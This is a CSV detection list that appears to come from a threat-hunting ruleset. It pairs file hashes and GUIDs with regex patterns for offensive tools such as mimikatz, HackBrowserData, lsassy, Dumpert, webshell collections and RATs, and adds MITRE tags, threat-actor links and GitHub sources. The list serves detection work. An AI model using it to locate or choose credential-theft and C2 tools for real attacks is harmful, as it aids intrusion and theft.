"*9a1f3ecde8800a00c549fbfa3cf55acbb811fec282d2bea19b27cca9bfe8b947*",".{0,1000}9a1f3ecde8800a00c549fbfa3cf55acbb811fec282d2bea19b27cca9bfe8b947.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31711"
"*9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0*",".{0,1000}9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","31712"
"*9a2e880adf7092cd9322b2dfaf502caa8e6a98afc0fecaa210a1d9f85c2bc017*",".{0,1000}9a2e880adf7092cd9322b2dfaf502caa8e6a98afc0fecaa210a1d9f85c2bc017.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31716"
"*9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1*",".{0,1000}9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","#filehash","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","31718"
"*9a3206e426e910fdc8b291763e15a9e52cb66c2d9b6437bb9ec54e3da97a60d0*",".{0,1000}9a3206e426e910fdc8b291763e15a9e52cb66c2d9b6437bb9ec54e3da97a60d0.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31719"
"*9a33a8d19676646badef58d0a2db13dd763288a2a0fb8452ae2a9f826b27a234*",".{0,1000}9a33a8d19676646badef58d0a2db13dd763288a2a0fb8452ae2a9f826b27a234.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31720"
"*9A374E66-70B5-433D-8D7D-89E3F8AC0617*",".{0,1000}9A374E66\-70B5\-433D\-8D7D\-89E3F8AC0617.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31721"
"*9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9*",".{0,1000}9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","31722"
"*9a48f69510e0194b5cbdcf9a15335b3db323c91898606e21ca57eae78d2bd27d*",".{0,1000}9a48f69510e0194b5cbdcf9a15335b3db323c91898606e21ca57eae78d2bd27d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31724"
"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*",".{0,1000}9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","31726"
"*9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4*",".{0,1000}9a4d894cc0d020b03fbbf1ad8d147fc7a871a633fdc67497685a8b8d52b465e4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31727"
"*9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70*",".{0,1000}9a53b903ad8a081200358238ad9d6a203f916f458024dd75cb04bb5063241d70.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31729"
"*9a5eb4fcc3cd9eabc8efc2e39bd091a2b63d7ae056dbcc7a0ee70a505b3f13b3*",".{0,1000}9a5eb4fcc3cd9eabc8efc2e39bd091a2b63d7ae056dbcc7a0ee70a505b3f13b3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31732"
"*9a620615e1f187058c3141b16c20e9622a7aa2a095f84783f91d55b0a8ea7e28*",".{0,1000}9a620615e1f187058c3141b16c20e9622a7aa2a095f84783f91d55b0a8ea7e28.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31733"
"*9a64e10f2857b52c60228b64f832d371781ce6fa6a73a2245400195838d3a81f*",".{0,1000}9a64e10f2857b52c60228b64f832d371781ce6fa6a73a2245400195838d3a81f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31734"
"*9a675b01d23c1afa606959ce6c9ef564a32db6672d993fa7ddb0f24dfcba850a*",".{0,1000}9a675b01d23c1afa606959ce6c9ef564a32db6672d993fa7ddb0f24dfcba850a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31735"
"*9a717740140d1848e3b2641af0a517cea689409951cb1262737b06ec398180e3*",".{0,1000}9a717740140d1848e3b2641af0a517cea689409951cb1262737b06ec398180e3.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","31739"
"*9a78032821b782755b4990d75b96ee3b77b58021b287d079b831f273e05636a7*",".{0,1000}9a78032821b782755b4990d75b96ee3b77b58021b287d079b831f273e05636a7.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31740"
"*9a7dc8a314e69eca7cfcd77046061485331e43c3c153ab9953e9c75f9e3db7d3*",".{0,1000}9a7dc8a314e69eca7cfcd77046061485331e43c3c153ab9953e9c75f9e3db7d3.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#filehash","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","31741"
"*9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6*",".{0,1000}9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31742"
"*9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6*",".{0,1000}9a83ec1bf3e113300930a7cc5d1259ef87bd85a428e3ede47104906ba3ac9fa6.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","31743"
"*9a85168c858654fac9052dc60b13a8c4e43c3621ea73ff3e4e9e3a6159662cfc*",".{0,1000}9a85168c858654fac9052dc60b13a8c4e43c3621ea73ff3e4e9e3a6159662cfc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31744"
"*9a85c7f95b97a65e72b0ab3c2780b0fdcf753d8997314f0aab7b11e9e31cda35*",".{0,1000}9a85c7f95b97a65e72b0ab3c2780b0fdcf753d8997314f0aab7b11e9e31cda35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31745"
"*9a872a2424ca1193c32e55b9bac11c09ba29d15182ad89734492c5193fd64d55*",".{0,1000}9a872a2424ca1193c32e55b9bac11c09ba29d15182ad89734492c5193fd64d55.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31746"
"*9a8e6eed94ace0f4d3b91c7a8eb44625aaeb777c757cb262b22591c0f6253449*",".{0,1000}9a8e6eed94ace0f4d3b91c7a8eb44625aaeb777c757cb262b22591c0f6253449.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","31747"
"*9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28*",".{0,1000}9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","31748"
"*9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28*",".{0,1000}9a8e9d587b570d4074f1c8317b163aa8d0c566efd88f294d9d85bc7776352a28.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31749"
"*9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378*",".{0,1000}9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31751"
"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*",".{0,1000}9AA32BBF\-90F3\-4CE6\-B210\-CBCDB85052B0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","31753"
"*9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827*",".{0,1000}9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","31758"
"*9ab40ecd7212576f2894c9e3d2eff74c62554e3abab7453c8edd7a7249c8b3f0*",".{0,1000}9ab40ecd7212576f2894c9e3d2eff74c62554e3abab7453c8edd7a7249c8b3f0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31759"
"*9ab8a5bbfcdac675219e4415487b8a34270102bb34089609378abe8ea071d13a*",".{0,1000}9ab8a5bbfcdac675219e4415487b8a34270102bb34089609378abe8ea071d13a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31760"
"*9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186*",".{0,1000}9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31761"
"*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*",".{0,1000}9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","31762"
"*9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843*",".{0,1000}9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31765"
"*9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49*",".{0,1000}9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31766"
"*9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49*",".{0,1000}9ad6a5728ea235b3ed9522a352a6f39fa92d3ac2b5bfebc6fae66638deb76b49.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31767"
"*9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5*",".{0,1000}9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","31768"
"*9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046*",".{0,1000}9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT  Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","#filehash","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","31769"
"*9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5*",".{0,1000}9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31770"
"*9ae914a31cb9728ac8bb4519698f992af1da69233f48eaf690e9e87cfc4445be*",".{0,1000}9ae914a31cb9728ac8bb4519698f992af1da69233f48eaf690e9e87cfc4445be.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31771"
"*9aeafd043bc6edebba1acbf6f457a63be0edd623899f6245b71ac2e7ba61e03d*",".{0,1000}9aeafd043bc6edebba1acbf6f457a63be0edd623899f6245b71ac2e7ba61e03d.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","31772"
"*9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559*",".{0,1000}9af2825ac48d01706aa0e6582cc477b4e1a561bf4dbff66608b68031347b8559.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31773"
"*9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654*",".{0,1000}9b0a4d1b72901510834789ba7c2a8bc8806c84b5cb06b29db4aba208a0e26654.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31778"
